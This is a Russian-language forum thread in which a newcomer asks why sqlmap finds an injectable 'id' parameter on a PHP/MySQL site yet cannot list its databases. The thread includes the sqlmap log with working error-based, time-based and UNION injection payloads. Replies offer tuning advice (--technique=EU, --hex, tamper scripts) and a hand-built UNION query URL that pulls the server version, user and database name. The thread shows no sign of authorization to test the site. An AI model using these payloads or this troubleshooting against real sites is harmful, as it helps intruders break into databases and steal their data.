Sqlmap не находит базы. Помогите.

[madheller404]

Есть уязвимый параметр, но sqlmap пишет unable to retrieve the database names. Я в этом деле недавно и не знаю как решить проблему. Пробовал -risk, -no-cast, но на ситуацию это не повлияло. Подскажите, как решить данный вопрос.

Лог:

Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=hugoboss' AND GTID_SUBSET(CONCAT(0x7176627071,(SELECT (ELT(4428=4428,1))),0x716a7a7171),4428)-- TSRY

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=hugoboss' AND (SELECT 1959 FROM (SELECT(SLEEP(5)))rvzq)-- MKau

Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=hugoboss' UNION ALL SELECT NULL,NULL,CONCAT(0x7176627071,0x5a6946544a62705774544458516c4742436348467852416d464657754e6962465a53745979476b4f,0x716a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.6



[09:13:31] [INFO] fetching database names
[09:13:32] [WARNING] the SQL query provided does not return any output
[09:13:33] [WARNING] the SQL query provided does not return any output
[09:13:33] [INFO] fetching number of databases
[09:13:33] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[09:13:50] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[09:13:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[09:13:50] [ERROR] unable to retrieve the number of databases
[09:13:50] [INFO] falling back to current database
[09:13:50] [INFO] fetching current database
[09:13:50] [CRITICAL] unable to retrieve the database names

 

[madheller404]

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Только это выдает

а в ручную пробывал в браузер вбить и посмотреть что дает?

 

[david100]

You are trying with "time-based blind"... Try with other methods "error based" and "UNION query"

--technique=EU

 

[heremy644]

на гитхабе можешь забить проблему, там иногда есть решения

 

[totulov45]

no-cast

 

[Desoxyn]

madheller404​

--hex -v 3 --technique=EU должно сработать, т.к. при union в хексе он увидел свою строку в выводе, значит есть принтабельное поле (можешь попробовать совместить с tamper="equaltolike" если не выводит, или с тампером, но без hex попробовать)
Гадать можно долго. Руками надо тестить, смотреть, что сыпет сервер в ответ. Или анализировать траффик, хотя бы на уровне --parse-errors -v 3, раз вывод ошибок есть. or -t /path/to/trafficfile
В браузере http_s://site.com/bug_script.php?id=hugoboss'+UNION+ALL+SELECT+NULL,NULL,CONCAT_WS(0x3A3a,version(),user(),database()),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- что выводит?